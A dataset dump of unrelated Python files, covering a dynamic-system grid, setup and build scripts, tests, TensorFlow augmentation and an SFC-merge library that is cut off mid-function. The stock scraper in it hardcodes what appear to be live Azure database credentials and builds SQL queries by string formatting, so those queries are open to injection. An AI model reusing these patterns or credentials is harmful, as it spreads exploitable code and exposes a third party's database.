content
stringlengths 5
1.05M
|
|---|
# -*- coding: utf-8 -*-
"""
Created on Wed Jul 12 10:02:12 2017
@author: alxgr
"""
import numpy as np
'''
################################################################################
'''
class GridDynamicSystem:
""" Create a discrete gird state-action space for a 2D continous dynamic system, one continuous input u """
############################
def __init__(self, sys , xgriddim = ( 101 , 101 ), ugriddim = ( 11 , 1 ) , dt = 0.05 ):
self.sys = sys # Dynamic system class
# Discretization Parameters
# Simple 1-DoF
self.dt = dt # time discretization
# Grid size
self.xgriddim = xgriddim
self.ugriddim = ugriddim
# Options
self.uselookuptable = True
self.compute()
##############################
def compute(self):
""" """
self.discretizespace()
self.discretizeactions()
print('\nDiscretization:\n---------------------------------')
print('State space dimensions:', self.sys.n , ' Input space dimension:', self.sys.m )
print('Number of nodes:', self.nodes_n , ' Number of actions:', self.actions_n )
print('Number of node-action pairs:', self.nodes_n * self.actions_n )
self.generate_nodes()
self.generate_actions()
if self.uselookuptable:
self.compute_lookuptable()
#############################
def discretizespace(self):
""" Grid the state space """
self.xd = []
self.nodes_n = 1
# n-D grid
self.x_grid2node = np.zeros( self.xgriddim , dtype = int ) # grid of corresponding index
# linespace for each x-axis and total number of nodes
for i in range(self.sys.n):
self.xd.append( np.linspace( self.sys.x_lb[i] , self.sys.x_ub[i] , self.xgriddim[i] ) )
self.nodes_n = self.nodes_n * self.xgriddim[i]
# 1-D List of nodes
self.nodes_state = np.zeros(( self.nodes_n , self.sys.n ), dtype = float ) # Number of nodes x state dimensions
self.nodes_index = np.zeros(( self.nodes_n , self.sys.n ), dtype = int ) # Number of nodes x state dimensions
#############################
def discretizeactions(self):
""" Grid the action space """
self.ud = []
self.actions_n = 1
# linespace for each u-axis and total number of actions
for i in range(self.sys.m):
self.ud.append( np.linspace( self.sys.u_lb[i] , self.sys.u_ub[i] , self.ugriddim[i] ) )
self.actions_n = self.actions_n * self.ugriddim[i]
# 1-D List of actions
self.actions_input = np.zeros(( self.actions_n , self.sys.m ), dtype = float ) # Number of actions x inputs dimensions
self.actions_index = np.zeros(( self.actions_n , self.sys.m ), dtype = int ) # Number of actions x inputs dimensions
##############################
def generate_nodes(self):
""" Compute 1-D list of nodes """
# For all state nodes
node = 0
if self.sys.n == 2 :
for i in range(self.xgriddim[0]):
for j in range(self.xgriddim[1]):
# State
x = np.array([ self.xd[0][i] , self.xd[1][j] ])
# State and grid index based on node #
self.nodes_state[node,:] = x
self.nodes_index[node,:] = np.array([i,j])
# Node # based on index ij
self.x_grid2node[i,j] = node
# Increment node number
node = node + 1
elif self.sys.n == 3:
for i in range(self.xgriddim[0]):
for j in range(self.xgriddim[1]):
for k in range(self.xgriddim[2]):
# State
x = np.array([ self.xd[0][i] , self.xd[1][j] , self.xd[2][k] ])
# State and grid index based on node #
self.nodes_state[node,:] = x
self.nodes_index[node,:] = np.array([i,j,k])
# Node # based on index ijk
self.x_grid2node[i,j,k] = node
# Increment node number
node = node + 1
else:
raise NotImplementedError
##############################
def generate_actions(self):
""" Compute 1-D list of actions """
# For all state nodes
action = 0
# Single input
if self.sys.m == 1 :
for k in range(self.ugriddim[0]):
u = np.array([ self.ud[0][k] ])
# State and grid index based on node #
self.actions_input[action,:] = u
self.actions_index[action,:] = k
# Increment node number
action = action + 1
elif self.sys.m == 2 :
for k in range(self.ugriddim[0]):
for l in range(self.ugriddim[1]):
u = np.array([ self.ud[0][k] , self.ud[1][l] ])
# State and grid index based on node #
self.actions_input[action,:] = u
self.actions_index[action,:] = np.array([k,l])
# Increment node number
action = action + 1
else:
raise NotImplementedError
##############################
def compute_lookuptable(self):
""" Compute lookup table for faster evaluation """
if self.uselookuptable:
# Evaluation lookup tables
self.action_isok = np.zeros( ( self.nodes_n , self.actions_n ) , dtype = bool )
self.x_next = np.zeros( ( self.nodes_n , self.actions_n , self.sys.n ) , dtype = float ) # lookup table for dynamic
# For all state nodes
for node in range( self.nodes_n ):
x = self.nodes_state[ node , : ]
# For all control actions
for action in range( self.actions_n ):
u = self.actions_input[ action , : ]
# Compute next state for all inputs
x_next = self.sys.f( x , u ) * self.dt + x
# validity of the options
x_ok = self.sys.isavalidstate(x_next)
u_ok = self.sys.isavalidinput(x,u)
self.x_next[ node, action, : ] = x_next
self.action_isok[ node, action] = ( u_ok & x_ok )
'''
################################################################################
'''
class GridDynamicSystem3D(GridDynamicSystem):
""" Create a discrete gird state-action space for 3D continous dynamic system, two continuous input u """
############################
def __init__(self, sys , dt = 0.05 , x_n = 21 , u_n = 11 ):
self.sys = sys # Dynamic system class
# Discretization Parameters
# Simple 1-DoF
self.dt = dt # time discretization
self.x0_n = x_n # x discretizatio
self.x1_n = x_n # dx discretization
self.x2_n = x_n # dx discretization
self.u0_n = u_n # u0 discretization
self.u1_n = u_n
# Options
self.uselookuptable = False # Too Big
self.compute()
#############################
def discretizespace(self):
""" Grid the state space """
# Grid
self.xgriddim = ( self.x0_n , self.x1_n , self.x2_n )
self.xd = [ None , None , None ]
self.xd[0] = np.linspace( self.sys.x_lb[0] , self.sys.x_ub[0] , self.x0_n )
self.xd[1] = np.linspace( self.sys.x_lb[1] , self.sys.x_ub[1] , self.x1_n )
self.xd[2] = np.linspace( self.sys.x_lb[2] , self.sys.x_ub[2] , self.x2_n )
self.x_grid2node = np.zeros( ( self.x0_n , self.x1_n , self.x2_n ) , dtype = int ) # grid of corresponding index
# 1-D List of nodes
self.nodes_n = self.x0_n * self.x1_n * self.x2_n
self.nodes_state = np.zeros(( self.nodes_n , self.sys.n ), dtype = float ) # Number of nodes x state dimensions
self.nodes_index = np.zeros(( self.nodes_n , self.sys.n ), dtype = int ) # Number of nodes x state dimensions
#############################
def discretizeactions(self):
""" Grid the action space """
# Grid
self.ugriddim = ( self.u0_n , self.u1_n )
self.ud = [ None , None ]
self.ud[0] = np.linspace( self.sys.u_lb[0] , self.sys.u_ub[0] , self.u0_n )
self.ud[1] = np.linspace( self.sys.u_lb[1] , self.sys.u_ub[1] , self.u1_n )
# 1-D List of actions
self.actions_n = self.u0_n * self.u1_n
self.actions_input = np.zeros(( self.actions_n , self.sys.m ), dtype = float ) # Number of actions x inputs dimensions
self.actions_index = np.zeros(( self.actions_n , self.sys.m ), dtype = int ) # Number of actions x inputs dimensions
##############################
def generate_nodes(self):
""" Compute 1-D list of nodes """
# For all state nodes
node = 0
for i in range(self.x0_n):
for j in range(self.x1_n):
for k in range(self.x2_n):
# State
x = np.array([ self.xd[0][i] , self.xd[1][j] , self.xd[2][k] ])
# State and grid index based on node #
self.nodes_state[node,:] = x
self.nodes_index[node,:] = np.array([i,j,k])
# Node # based on index ijk
self.x_grid2node[i,j,k] = node
# Increment node number
node = node + 1
##############################
def generate_actions(self):
""" Compute 1-D list of actions """
# For all state nodes
action = 0
for l in range(self.u0_n):
for m in range(self.u1_n):
u = np.array([ self.ud[0][l] , self.ud[1][m] ])
# State and grid index based on node #
self.actions_input[action,:] = u
self.actions_index[action,:] = np.array([l,m])
# Increment node number
action = action + 1
'''
#################################################################
################## Main ########
#################################################################
'''
if __name__ == "__main__":
""" MAIN TEST """
from pyro.dynamic import Manipulator as M
# Define dynamic system
R = M.OneLinkManipulator()
dR = GridDynamicSystem2D( R )
|
from setuptools import setup, find_packages
setup(
name='mlem',
version='0.0.1',
packages=["mlem"],
install_requires=['numpy', 'Pillow', 'scipy'],
tests_require=['pytest'],
license='MIT'
)
|
'''
@author: Dallas Fraser
@author: 2019-03-13
@organization: MLSB API
@summary: Tests all the advanced player lookup APIs
'''
from datetime import date
from api.helper import loads
from api.routes import Routes
from base64 import b64encode
from api.test.advanced.mock_league import MockLeague
from api.test.BaseTest import TestSetup, ADMIN, PASSWORD
headers = {
'Authorization': 'Basic %s' % b64encode(bytes(ADMIN + ':' +
PASSWORD, "utf-8")
).decode("ascii")
}
VALID_YEAR = date.today().year
INVALID_YEAR = 100
class PlayerLookupTest(TestSetup):
def testPlayerName(self):
"""Test player name parameter"""
mocker = MockLeague(self)
# non existent player name
expect = []
name = "NAME DOES NOT EXISTS FOR REASONS"
rv = self.app.post(Routes['vplayerLookup'], data={'player_name': name})
self.output(expect)
self.output(loads(rv.data))
self.assertEqual(expect,
loads(rv.data),
Routes['vplayerLookup'] + ": invalid player name")
# a valid player
expect = [mocker.get_players()[0]]
name = mocker.get_players()[0]['player_name']
rv = self.app.post(Routes['vplayerLookup'], data={'player_name': name})
self.output(expect)
self.output(loads(rv.data))
self.assertEqual(expect,
loads(rv.data),
Routes['vplayerLookup'] + ": valid player name")
def testEmail(self):
"""Test email parameter"""
mocker = MockLeague(self)
# non existent player name
expect = []
email = "EMAILDOESNOTEXISTSFOR@reasons.com"
rv = self.app.post(Routes['vplayerLookup'], data={'email': email})
self.output(expect)
self.output(loads(rv.data))
self.assertEqual(expect,
loads(rv.data),
Routes['vplayerLookup'] + ": invalid email")
# a valid email
expect = [mocker.get_players()[0]]
email = mocker.get_player_email(0)
rv = self.app.post(Routes['vplayerLookup'], data={'email': email})
self.output(expect)
self.output(loads(rv.data))
self.assertEqual(expect,
loads(rv.data),
Routes['vplayerLookup'] + ": valid email")
def testActive(self):
"""Test active parameter"""
mocker = MockLeague(self)
# all players
player = mocker.get_players()[0]
expect = [player]
active = 0
name = player['player_name']
rv = self.app.post(Routes['vplayerLookup'], data={'active': active,
'player_name': name})
self.output(expect)
self.output(loads(rv.data))
self.assertTrue(len(loads(rv.data)) > 0,
Routes['vplayerLookup'] + ": active & non-active")
self.assertEqual(expect,
loads(rv.data),
Routes['vplayerLookup'] + ": active & non-active")
# now make the player non-active
self.deactivate_player(player)
# only active players
active = 1
rv = self.app.post(Routes['vplayerLookup'], data={'active': active,
'player_name': name})
expect = []
self.output(expect)
self.output(loads(rv.data))
activity = [_player['active'] for _player in loads(rv.data)]
error_message = Routes['vplayerLookup'] + ":non-active player returned"
self.assertTrue(False not in activity, error_message)
self.assertEqual(expect, loads(rv.data), error_message)
|
# -*- coding: utf-8 -*-
from . import abono
from . import cliente
from . import empleado
from . import instalacion
from . import material
from . import pago
from . import reserva
from . import tarjeta
from . import efectivo
|
from .countries import COUNTRIES
from .regions import REGIONS
from .wmi import WMI
|
#
# to create executables for the filter and integrator
# type the following at the command line in this directory:
# python setup_py2exe.py py2exe
# executables will appear in the dist subdirectory
"""
Important note:
seeing errors in build with python setup.py py2exe?
move whole directory to a non-networked drive!
Seeing errors about vcvarsall.bat?
SET VS90COMNTOOLS=%VS100COMNTOOLS%
"""
##
from distutils.core import setup
# from setuptools import setup
import py2exe
import sys
import os
import shutil
import numpy
import numpy.oldnumeric
import scipy
from scipy import ndimage
import matplotlib
matplotlib.use('WXAgg')
from matplotlib.widgets import Cursor
from matplotlib import pyplot
from matplotlib import pylab
import h5py
import Image
#import sqlalchemy
import wx
from wx.lib.splitter import MultiSplitterWindow
from wx.tools.Editra.src.eclib import pstatbar
import ctypes
import ctypes.util
from numpy import sort
#import scipy.lib.six
import scipy.io.netcdf
from scipy.io.netcdf import netcdf_file
#from scipy.sparse.csgraph import _validation
#from scipy.special import _ufuncs, _ufuncs_cxx
import scipy.constants
from background import background
loadlib = ctypes.windll.LoadLibrary
x = xrange(10)
# larch library bits...
#import larch
#from larch.larchlib import get_dll
#cllib = get_dll('cldata')
#matplotlib, wxmplot
matplotlib.use('WXAgg')
mpl_data_files = matplotlib.get_py2exe_datafiles()
# import wxmplot
## epics
#try:
# import epics
# ca = epics.ca.initialize_libca()
#except ImportError:
# pass
extra_files = ['inno_setup.iss', '../COPYING', '../README.txt',
'../bin/GSEMap.ico', '../bin/larch.ico', '../bin/ptable.ico']
scipy_dlls = ['lib/site-packages/scipy/optimize/minpack2.pyd',
'lib/site-packages/scipy/interpolate/dftipack.pyd',
'lib/site-packages/scipy/integrate/_quadpack.pyd',
'lib/site-packages/numpy/fft/fftpack_lite.pyd']
dlldir = os.path.join(sys.prefix, 'DLLs')
for n in os.listdir(dlldir):
extra_files.append(os.path.join(dlldir, n))
for n in scipy_dlls:
extra_files.append(os.path.join(sys.prefix, n))
style_xml = """
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
version="5.0.0.0"
processorArchitecture="x86"
name="XrayLarch"
type="win32"
/>
<description>XrayLarch</description>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
level="asInvoker"
uiAccess="false">
</requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.VC90.CRT"
version="9.0.21022.8"
processorArchitecture="x86"
publicKeyToken="1fc8b3b9a1e18e3b">
</assemblyIdentity>
</dependentAssembly>
</dependency>
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="X86"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
</assembly>
"""
windows_apps = [{'script': 'run_integrator.py',
# 'icon_resources': [(0, '../bin/larch.ico')],
'other_resources': [(24, 1, style_xml)],
},
{'script': 'run_filter.py',
# 'icon_resources': [(0, '../bin/GSEMap.ico')],
'other_resources': [(24, 1, style_xml)],
},
]
py2exe_opts = {'optimize':1,
'bundle_files':2,
'includes': ['ConfigParser', 'Image', 'ctypes',
'fpformat',
'h5py', 'h5py._objects', 'h5py._proxy',
'h5py.defs', 'h5py.utils',
'matplotlib',
'matplotlib.widgets',
#'matplotlib.backends.backend_tkagg',
#'matplotlib.backends.backend_wxagg',
'numpy', 'numpy.oldnumeric',
'scipy',
'scipy.lib', 'scipy.ndimage', 'scipy.stats',
#'scipy.lib.six',
'scipy.constants',
'scipy.fftpack',
'scipy.sparse',
# 'scipy.sparse.compressed',
# 'scipy.sparse.sparsetools',
'scipy.sparse.csgraph',
#'scipy.sparse.csgraph._validation',
#'scipy.special._ufuncs_cxx',
'scipy.io.matlab.mio5_utils',
'scipy.io.matlab.streams',
'scipy.io.netcdf',
'scipy.optimize',
'scipy.signal',
'wx', 'wx._core',
#'wx.exit',
'wx.richtext',
'wx.lib', 'wx.lib.agw',
'wx.lib.agw.flatnotebook',
'wx.lib.colourselect', 'wx.lib.masked',
'wx.lib.mixins', 'wx.lib.mixins.inspection',
'wx.lib.agw.pycollapsiblepane',
'wx.lib.splitter',
'wx.tools.Editra', 'wx.tools.Editra.src.eclib',
'wx.lib.newevent', 'wx.py',
'wxversion', 'xdrlib', 'xml.etree',
'xml.etree.cElementTree'],
'packages': ['h5py', 'scipy.optimize', 'scipy.signal', 'scipy.io',
'numpy.random', 'xml.etree', 'xml.etree.cElementTree'],
'excludes': ['Tkinter', '_tkinter', 'Tkconstants', 'tcl',
'_imagingtk', 'PIL._imagingtk', 'ImageTk',
'PIL.ImageTk', 'FixTk''_gtkagg', '_tkagg',
'matplotlib.tests', 'qt', 'PyQt4Gui', 'IPython',
'pywin', 'pywin.dialogs', 'pywin.dialogs.list'],
'dll_excludes': [# 'w9xpopen.exe',
# 'libgdk-win32-2.0-0.dll',
# 'libgobject-2.0-0.dll', 'libzmq.dll'
]
}
setup(name = "GSE_CTR",
windows = windows_apps,
options = {'py2exe': py2exe_opts},
data_files = mpl_data_files)
for fname in extra_files:
path, name = os.path.split(fname)
print fname, name
try:
shutil.copy(fname, os.path.join('dist', name))
except:
pass
if __name__ == '__main__':
print 'usage: python py2exe_build.py py2exe'
|
from scanpy import read_h5ad
from ._io import read_10x_vdj, read_tracer, read_airr, read_bracer
from ._convert_anndata import from_ir_objs, to_ir_objs
from ..util import deprecated
from ._datastructures import IrCell, IrChain
@deprecated(
"Due to added BCR support, this function has been renamed "
"to `from_ir_objs. The old version will be removed in a future release. "
)
def from_tcr_objs(*args, **kwargs):
return from_ir_objs(*args, **kwargs)
@deprecated(
"Due to added BCR support, this function has been renamed "
"to `IrCell. The old version will be removed in a future release. "
)
def TcrCell(*args, **kwargs):
return IrCell(*args, **kwargs)
@deprecated(
"Due to added BCR support, this function has been renamed "
"to `IrChain. The old version will be removed in a future release. "
)
def TcrChain(*args, **kwargs):
return IrChain(*args, **kwargs)
|
import kol.Error as Error
from kol.database import ItemDatabase
from kol.manager import PatternManager
from kol.request.GenericRequest import GenericRequest
class WokRequest(GenericRequest):
def __init__(self, session, itemid1, numMake=1):
super(WokRequest, self).__init__(session)
self.url = session.serverURL + "guild.php"
self.requestData['pwd'] = session.pwd
self.requestData['action'] = 'wokcook'
self.requestData['qty'] = numMake
self.requestData['whichitem'] = itemid1
def parseResponse(self):
noWokAccess = PatternManager.getOrCompilePattern('noWokAccess')
itemsDontMakeFoodPattern = PatternManager.getOrCompilePattern('dontHaveItemsForWok')
dontHaveSkillPattern = PatternManager.getOrCompilePattern('dontHaveSkillForWok')
dontHaveAdventuresPattern = PatternManager.getOrCompilePattern('dontHaveAdventuresForWok')
# Check for errors.
if noWokAccess.search(self.responseText):
raise Error.Error("Unable to use the Wok of Ages. I can't get to the Wok!", Error.RECIPE_NOT_FOUND)
elif dontHaveSkillPattern.search(self.responseText):
raise Error.Error("Unable to use the Wok of Ages. I am not skilled enough.", Error.SKILL_NOT_FOUND)
elif itemsDontMakeFoodPattern.search(self.responseText):
raise Error.Error("Unable to use the Wok of Ages. Invalid ingredients.", Error.ITEM_NOT_FOUND)
elif dontHaveAdventuresPattern.search(self.responseText):
raise Error.Error("Unable to use the Wok of Agles. I don't have enough adventures.", Error.NOT_ENOUGH_ADVENTURES)
# Find the items attached to the message.
singleItemPattern = PatternManager.getOrCompilePattern('acquireSingleItem')
match = singleItemPattern.search(self.responseText)
if match:
descId = int(match.group(1))
item = ItemDatabase.getOrDiscoverItemFromDescId(descId, self.session)
item["quantity"] = 1
else:
multiItemPattern = PatternManager.getOrCompilePattern('acquireMultipleItems')
match = multiItemPattern.search(self.responseText)
if match:
descId = int(match.group(1))
item = ItemDatabase.getOrDiscoverItemFromDescId(descId, self.session)
quantity = int(match.group(2).replace(',', ''))
item["quantity"] = quantity
else:
raise Error.Error("Unknown error.", Error.REQUEST_GENERIC)
self.responseData["wok"] = item
|
from bs4 import BeautifulSoup
import requests
import pandas as pd
from datetime import date, datetime
from sqlalchemy import create_engine
from psycopg2.errors import UniqueViolation
AZURE_IP_ADDRESS = 'stocks-db.postgres.database.azure.com'
AZURE_PORT = '5432'
AZURE_USERNAME = 'mattooren@stocks-db'
AZURE_PASSWORD = 'YehNYA97vZGueESf'
AZURE_TABLE = 'postgres'
def parse_ASN_koersen_table(table):
table_rows = table.find_all('tr')
res = []
for tr in table_rows:
td = tr.find_all('td')
row = [tr.text.strip() for tr in td if tr.text.strip()]
if row:
res.append(row)
else:
th = tr.find_all('th')
columns = [tr.text.strip() for tr in th if tr.text.strip()]
return pd.DataFrame(res, columns=columns)
def load_koersen_from_ASN(**kwargs):
result = requests.get("https://www.asnbank.nl/zakelijk/zakelijke-beleggingsrekening/koersen.html")
soup = BeautifulSoup(result.content, 'html.parser')
table = soup.find(lambda tag: tag.name == 'table' and tag.has_attr('id') and tag['id'] == "table410710")
df = parse_ASN_koersen_table(table)
load_koersen_into_database(df)
return df
def load_koersen_into_database(df_koersen):
con = connect_to_database()
add_funds(con, df_koersen.iloc[:,0].array)
add_share_prices(con, df_koersen)
def add_funds(con, array_koersen):
for koers in array_koersen:
result = con.execute("SELECT * FROM fund WHERE fund_id = '{}'".format(koers))
if result.rowcount == 0:
con.execute("INSERT INTO fund(fund_id) VALUES ('{}') ".format(koers))
def add_share_prices(con, df_koersen):
data_koersen = df_koersen.set_index(df_koersen.columns[0]).stack().reset_index()
data_koersen.columns = ['fund_id', 'datetime', 'share_price']
data_koersen['datetime'] = pd.to_datetime(data_koersen['datetime'], format='%d-%m-%Y')
data_koersen['share_price'] = data_koersen['share_price'].apply(lambda x: x.replace(',' , '.')).astype(float)
data_koersen['creation_time'] = datetime.now()
current_id = con.execute("SELECT MAX(share_price_id) from share_price").first()[0]
current_id = 0 if current_id == None else current_id + 1
for index, row in data_koersen.iterrows():
query = "INSERT INTO share_price(share_price_id, fund_id, datetime, share_price, creation_time) VALUES('{}', '{}', '{}', '{}', '{}')".format(
current_id,
row['fund_id'],
row['datetime'],
row['share_price'],
row['creation_time']
)
result = con.execute("SELECT * FROM share_price WHERE fund_id = '{}' AND datetime = '{}'".format(row['fund_id'], row['datetime']))
if result.rowcount == 0:
con.execute(query)
current_id += 1
def connect_to_database():
url = 'postgresql://{}:{}@{}:{}/{}'.format(AZURE_USERNAME, AZURE_PASSWORD, AZURE_IP_ADDRESS, AZURE_PORT, AZURE_TABLE)
engine = create_engine(url)
return engine
if __name__ == '__main__':
ds = 1
print(load_koersen_from_ASN())
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =========================================================================
import pdb
import tensorflow as tf
from basenji import ops
def shift_sequence(seq, shift_amount, pad_value=0.25):
"""Shift a sequence left or right by shift_amount.
Args:
seq: a [batch_size, sequence_length, sequence_depth] sequence to shift
shift_amount: the signed amount to shift (tf.int32 or int)
pad_value: value to fill the padding (primitive or scalar tf.Tensor)
"""
if seq.shape.ndims != 3:
raise ValueError('input sequence should be rank 3')
input_shape = seq.shape
pad = pad_value * tf.ones_like(seq[:, 0:tf.abs(shift_amount), :])
def _shift_right(_seq):
sliced_seq = _seq[:, :-shift_amount:, :]
return tf.concat([pad, sliced_seq], axis=1)
def _shift_left(_seq):
sliced_seq = _seq[:, -shift_amount:, :]
return tf.concat([sliced_seq, pad], axis=1)
output = tf.cond(
tf.greater(shift_amount, 0), lambda: _shift_right(seq),
lambda: _shift_left(seq))
output.set_shape(input_shape)
return output
def augment_deterministic_set(data_ops, augment_rc=False, augment_shifts=[0]):
"""
Args:
data_ops: dict with keys 'sequence,' 'label,' and 'na.'
augment_rc: Boolean
augment_shifts: List of ints.
Returns
data_ops_list:
"""
augment_pairs = []
for ashift in augment_shifts:
augment_pairs.append((False, ashift))
if augment_rc:
augment_pairs.append((True, ashift))
data_ops_list = []
for arc, ashift in augment_pairs:
data_ops_aug = augment_deterministic(data_ops, arc, ashift)
data_ops_list.append(data_ops_aug)
return data_ops_list
def augment_deterministic(data_ops, augment_rc=False, augment_shift=0):
"""Apply a deterministic augmentation, specified by the parameters.
Args:
data_ops: dict with keys 'sequence,' 'label,' and 'na.'
augment_rc: Boolean
augment_shift: Int
Returns
data_ops: augmented data, with all existing keys transformed
and 'reverse_preds' bool added.
"""
data_ops_aug = {}
for key in data_ops:
if key not in ['sequence']:
data_ops_aug[key] = data_ops[key]
if augment_shift == 0:
data_ops_aug['sequence'] = data_ops['sequence']
else:
shift_amount = tf.constant(augment_shift, shape=(), dtype=tf.int64)
data_ops_aug['sequence'] = shift_sequence(data_ops['sequence'], shift_amount)
if augment_rc:
data_ops_aug = augment_deterministic_rc(data_ops_aug)
else:
data_ops_aug['reverse_preds'] = tf.zeros((), dtype=tf.bool)
return data_ops_aug
def augment_deterministic_rc(data_ops):
"""Apply a deterministic reverse complement augmentation.
Args:
data_ops: dict with keys 'sequence,' 'label,' and 'na.'
Returns
data_ops_aug: augmented data ops
"""
data_ops_aug = ops.reverse_complement_transform(data_ops)
data_ops_aug['reverse_preds'] = tf.ones((), dtype=tf.bool)
return data_ops_aug
def augment_stochastic_rc(data_ops):
"""Apply a stochastic reverse complement augmentation.
Args:
data_ops: dict with keys 'sequence,' 'label,' and 'na.'
Returns
data_ops_aug: augmented data
"""
reverse_preds = tf.random_uniform(shape=[]) > 0.5
data_ops_aug = tf.cond(reverse_preds, lambda: ops.reverse_complement_transform(data_ops),
lambda: data_ops.copy())
data_ops_aug['reverse_preds'] = reverse_preds
return data_ops_aug
def augment_stochastic_shifts(seq, augment_shifts):
"""Apply a stochastic shift augmentation.
Args:
seq: input sequence of size [batch_size, length, depth]
augment_shifts: list of int offsets to sample from
Returns:
shifted and padded sequence of size [batch_size, length, depth]
"""
shift_index = tf.random_uniform(shape=[], minval=0,
maxval=len(augment_shifts), dtype=tf.int64)
shift_value = tf.gather(tf.constant(augment_shifts), shift_index)
seq = tf.cond(tf.not_equal(shift_value, 0),
lambda: shift_sequence(seq, shift_value),
lambda: seq)
return seq
def augment_stochastic(data_ops, augment_rc=False, augment_shifts=[]):
"""Apply stochastic augmentations,
Args:
data_ops: dict with keys 'sequence,' 'label,' and 'na.'
augment_rc: Boolean for whether to apply reverse complement augmentation.
augment_shifts: list of int offsets to sample shift augmentations.
Returns:
data_ops_aug: augmented data
"""
if augment_shifts:
data_ops['sequence'] = augment_stochastic_shifts(data_ops['sequence'],
augment_shifts)
if augment_rc:
data_ops = augment_stochastic_rc(data_ops)
else:
data_ops['reverse_preds'] = tf.zeros((), dtype=tf.bool)
return data_ops
|
# Write tests for the hosts here.
import os
import testinfra.utils.ansible_runner
testinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(
os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('all')
import pytest
# Basic sanity check - the hosts file should be long to root
def test_hosts_file(host):
f = host.file('/etc/hosts')
assert f.exists
assert f.user == 'root'
assert f.group == 'root'
# Basic sanity check - ntp must be installed
def test_ntp(host):
assert host.package('ntp').is_installed
@pytest.mark.parametrize("package_name", [("perfsonar-tools"),("perfsonar-core"),("perfsonar-common"),("perfsonar-oppd-bwctl"),("perfsonar-oppd-owamp"),("perfsonar-oppd-server"),("perfsonar-oppd-shared"),("perfsonar-testpoint"),("perfsonar-tools")])
def test_prerequisites(host,package_name):
package = host.package(package_name)
assert package.is_installed
# def test_migration(host):
# f = host.file('/usr/lib/perfsonar/scripts/ps-migrate-backup.sh')
# assert f.exists
|
#!/usr/bin/env python
""" P4SC library: libMerge.py
This file provides fundamental functions of merging SFCs
Author: XiangChen, 2018.3.23
"""
import os
import sys
import argparse
import commands
import time
import datetime
import math
import psutil
from lcsSrc.lcs import *
from tableCmpSrc.genTopoOrder import *
""" P4SC LCS algorithm, used to merge two SFCs
"""
def merge(l1,l2):
# Running key algorithm
lists = lcs(l1, l2)
if lists == [[]]:
print "The lcs list is empty, so simply merge the two orders.\n"
return l1+l2
else:
print "Found the lcs order set."
"""Choose the first order in the lcs order list based on value file"""
lcsOrder = lists[0]
"""Merge the two topologic orders"""
# Here we create a set named "First" to record the previous variables
# in the set of insert list(insl), i.e.the variables before the first
# common LCS variable.
#
# To handle the First set, we insert it before the place where the
# first lcs variable occurs.
basel, insl = [], []
if len(l1) >= len(l2):
basel, insl = l1, l2
else:
basel, insl = l2, l1
# the first lcs variable
first_lcs_val = lcsOrder[0]
# the index of first lcs variable in base list
first_lcs_val_idx_in_basel = 0
for base_idx in range(len(basel)):
if basel[base_idx] == first_lcs_val:
first_lcs_val_idx_in_basel = base_idx
break
# initial mergedl: merged list
mergedl = basel
first_lcs_val_idx_in_mergedl = first_lcs_val_idx_in_basel
# Here we start to divide the insert list into two parts:
# the first set and the other parts of insert list.
### 1.calculate the first set and the corresponding index
first_set = []
first_lcs_val_idx_in_insl = 0
for insl_idx in range(len(insl)):
if insl[insl_idx] == first_lcs_val:
first_lcs_val_idx_in_insl = insl_idx
break
else:
first_set.append(insl[insl_idx])
### 2.handle the first set
if first_set == []:
print "Warning: The first set is empty. Ignoring the handling of first set.", '\n'
pass
else:
# insert to the place before first lcs variable in merged list
insert_base = first_lcs_val_idx_in_mergedl
for insert_idx in range(len(first_set)):
insert_hdl = insert_base+insert_idx
mergedl.insert(insert_hdl, first_set[insert_idx])
# update the place index of the index of first lcs variable in merged list
first_lcs_val_idx_in_mergedl += len(first_set)
# current insl : [first_set] [first value of lcs order] [other elements]
# current mergedl: [first_set] [first value of lcs order] [other elements]
# Now we start to merge insl to mergedl based on lcs order sequence
### 3.handle the other parts of insert list
# the movp points to the first lcs val in merged list at beginning
# movp is used to traverse >> mergedl << and indicate current element
movp = first_lcs_val_idx_in_mergedl+1
# we decide that if current value is also the top value of mergedl,
# the converter pops it and move movp to the place of current value
# in mergedl
# initialization: the original lcs order value has been used to decide
# the begin of following loop
isEmpty = False
del lcsOrder[0]
# the lcsOrder is empty
if lcsOrder == []:
topVal, isEmpty = 0, True
else:
topVal = lcsOrder[0]
# start from the first value after the first lcs value on mergedl
startIdx = first_lcs_val_idx_in_insl+1
for insert_idx in range(startIdx, len(insl)):
# the current value of >> insl <<
current_val = insl[insert_idx]
# if the current value is in the lcsOrder, move the movp to
# the place of current value in >> mergedl <<
if current_val == topVal and not isEmpty:
# remove topVal from lcs order and update topVal
lcsOrder.remove(topVal)
if lcsOrder == []:
pass
else:
topVal = lcsOrder[0]
# move movp to current_val in >> mergedl <<
for i in range(movp,len(mergedl)):
if mergedl[i] == current_val:
# move to the next place after current vaule in >> mergedl <<
movp = i+1
break
# if not found, raise error(this program has bug, please contact me)
if i == len(mergedl)-1:
print "Error: current_val not found in mergedl."
return
# otherwise, insert it to >> mergedl <<
else:
mergedl.insert(movp, current_val)
movp += 1
return mergedl
""" Merge files on assigned directory
"""
def run_merge_sfcs(sfc_files, result_f_name, test_num):
start = datetime.datetime.now()
"""merge mechanism:"""
# copy the first sfc
f1_name, fidx = sfc_files[0], 0
cmd = "cp -r %s %s" % (f1_name, result_f_name)
status, output = commands.getstatusoutput(cmd)
if status != 0:
print "\nError occurred as copying result.txt.\n"
print output
return
# merge other sfcs, and store the results on "results.txt"(result_f)
# merge time = total number of DAG -1
mergeTime, mergedl = test_num-1, []
